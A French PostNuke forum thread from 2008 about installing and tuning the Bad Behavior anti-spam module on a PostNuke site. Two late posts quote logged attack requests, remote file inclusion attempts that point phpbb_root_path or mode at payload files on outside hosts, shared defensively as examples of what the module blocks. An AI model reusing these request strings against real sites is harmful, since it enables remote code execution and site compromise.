| installation de bad behaviour (anti spam de pn) : tips | |
| Auteur | Sujet |
|---|---|
|
mumuri Franc-Maçon 
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08 
|
  
Si vous désirez installer ce module, il ne suffit pas de le charger sur le site et de l'activer (et non:))
en faites il y a un hack à rajouter éditer "includes/pnAPI.php" rajouter Code: [Télécharger] [Cacher]
avant Code: [Télécharger] [Cacher]
voir dossier pnDocs pour plus de détails |
| 31.05.2008, 15:40 | 
|
|
|
|
Makeu Bisu 
enregistré depuis : oct. 2005 Messages : 93 dernière visite: 18.07.08
|
Et il fait quoi au juste ce module ?
Petite précision, il faut mettre le code dans la fonction pnInit () vers la ligne 397. modifié par : Makeu, 31 Mai 2008 - 17:48 |
| 31.05.2008, 17:46 |
|
|
|
|
mumuri Franc-Maçon
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08
|
il bloque le spam en utilisant des informations connus sur les caractéristiques de ces spammers
voir http://www.bad-behavior.ioerror.us/documentation/benefits/ comment çà marche http://www.bad-behavior.ioerror.us/documentation/how-it-works/ si tu regardes dans le code (répertoire includes) , tu devrais mieux comprendre genre dans blacklist, mais çà va plus loin que çà Code: [Télécharger] [Cacher]
modifié par : mumuri, 31 Mai 2008 - 19:24 |
| 31.05.2008, 19:23 |
|
|
|
|
Makeu Bisu
enregistré depuis : oct. 2005 Messages : 93 dernière visite: 18.07.08
|
Ok merci mumuri.
Je me suis penché dessus et je l'ai testé sur le mes-anniversaires. Mais je rencontre deux problèmes. Il me bloque le bot de Exalead... un peu gênant ! Et encore plus gênant, je ne peux plus accéder aux autres fonctions autres que la fonction main de mes modules... Je vais regarder d'un peu plus près ce qui cloche, je suis sous une rc 4 avec un url rewriting par dossier. |
| 31.05.2008, 19:37 |
|
|
|
|
Makeu Bisu
enregistré depuis : oct. 2005 Messages : 93 dernière visite: 18.07.08
|
Après quelques tests complémentaires, si je décoche Verbose HTTP request logging (Logs all requests not just those blocked) et Strict checking (blocks more spam but may block some people), je n'ai plus le problème pour voir les autres fonctions autres que le main.
J'ai vu sinon que tu avais posé une question à markwest pour savoir si yahoo ne se faisait pas bloqué... non au vu des logs, le bot de yahoo est bien passé sur mon site ;) |
| 31.05.2008, 20:04 |
|
|
|
|
mumuri Franc-Maçon
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08
|
disons que je trouvais bizarre que Msn et Google est une white list d'ip (voir fichier bad behaviour) mais que yahoo soit mis de coté.
|
| 31.05.2008, 21:04 |
|
|
|
|
mumuri Franc-Maçon
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08
|
j'ai la premiére et dernière option activé (pas "voir les requêtes en cour" ) et çà marche
par contre, tu me confirmes, mais le cache de pnRender activé, le module est ingérable à priori çà marche bien .. un mec à tenter çà ... /phpbb-test-t1311.html//includes/functions_portal.php?phpbb_root_path=http://www.geocities.com/maya.risa/id.txt??? un conseil si vous avez çà faites un "tracert ip" et soumettait un mail au provider du server ... si vous utilisez le cache http://noc.postnuke.com/tracker/ind..._id=60&atid=265 modifié par : mumuri, 01 Jn 2008 - 20:51 |
| 01.06.2008, 12:08 |
|
|
|
|
Makeu Bisu
enregistré depuis : oct. 2005 Messages : 93 dernière visite: 18.07.08
|
"par contre, tu me confirmes, mais le cache de pnRender activé, le module est ingérable" Oui je te confirme.
Sinon j'ai mis à jour la version de bad behaviour vers la version 2.0.16. Pour faire cette maj, tu télécharges la nouvelle version et tu remplaces tous les fichiers qui sont dans le répertoire pnincludes/bad-behavior. Ensuite tu modifies le fichier bad-behavior-postnuke.php dans le répertoire pnincludes et tu rajoutes 'logging' => true dans la fonction bb2_read_settings à la ligne 84 : Code: [Télécharger] [Cacher]
Pour moi les tests ont été concluant, il ne m'enregistre en bd que les requêtes qui ont été bloquées. *J'espère que cette maj va laisser passer le bot de exalead modifié par : Makeu, 02 Jn 2008 - 11:45 |
| 02.06.2008, 11:44 |
|
|
|
|
mumuri Franc-Maçon
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08
|
merci je verrai çà quand j'aurai le temps (en faites chez moi çà fonctionne depuis le début ( 1000 bloqués en 1 jours)), je pense je vais la maj , mais c'est plus pour ce qu'il dise sur le site officiel
http://www.bad-behavior.ioerror.us/2008/05/18/bad-behavior-2016/ une autre remarque, çà bloque mais çà banni pas, çà c'est un peu chiant, je pense que je vais coder un site pour bloquer toutes les attaques identifiés bye tu l'as soumis en patch sur trac ? modifié par : mumuri, 02 Jn 2008 - 14:36 |
| 02.06.2008, 12:27 |
|
|
|
|
mumuri Franc-Maçon
enregistré depuis : oct. 2005 Messages : 659 dernière visite: 31.08.08
|
la 2.0.16 est sorti pour ceux qui sont intéréssés
au passage, j'avais parlé d'anti spam, mais y'a aussi une notion de sécurité ... tous les scripts "kiddies" qui tentent des trucs comme çà sont bloqués /mots-design.html//MOD_forum_fields_parse.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? GET //index.php?mode=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1Te: deflate,gzip;q=0.3Connection: TE, closeHost: forum.topflood.comUser-Agent: libwww-perl/5.79 modifié par : mumuri, 06 Jl 2008 - 22:23 |
| 06.07.2008, 22:19 |
|
|
|
Tous les logos et marques de commerce sur ce site sont la propriété de leur auteur respectif.
Les commentaires sont la propriété des intervenants, tout le reste (c) 2004 par PostNuke-France.
Ce site Internet a été créé avec PostNuke, un système de portail Web écrit en PHP. PostNuke est distribué sous la licence GNU/GPL.
Vous avez accès au Fil de syndication de ce site en utilisant le fichier backend.php.
Ce site a fait l'objet d'une déclaration au CNIL sous le No 820332,
conformément à l'article 27 de la loi n°78-17 du 6 janvier 1978 relative à l'informatique, aux fichiers et aux libertés.
Thème général adapté en partie d'un thème phpbbstyles.com